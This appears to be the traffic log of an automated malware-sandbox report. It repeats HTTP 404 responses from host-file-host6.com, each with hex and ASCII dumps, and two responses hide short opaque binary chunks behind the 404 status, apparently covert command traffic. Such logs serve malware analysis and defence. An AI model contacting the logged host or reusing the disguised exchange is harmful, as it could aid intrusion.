                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 8e 2c b4 59 52 db 03 f8 e5 2c f3 65 0c 4d eb a9 e3 1e bb 52 df 4b de fb 21 8d 24 80 ab 94 51 2d f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OU&,YR,eMRK!$Q-~0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 95 d2 08 5f 3c 5c a1 f3 d8 fc f8 5e b2 32 8f 78 84 06 4e ba 57 ff cd 78 e9 0c 03 0e f3 a9 88 17 bd 54 d0 47 de f7 22 80 27 ed ac 9b 56 2f e6 b2 4c 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82O_<\^2xNWxTG"'V/L50
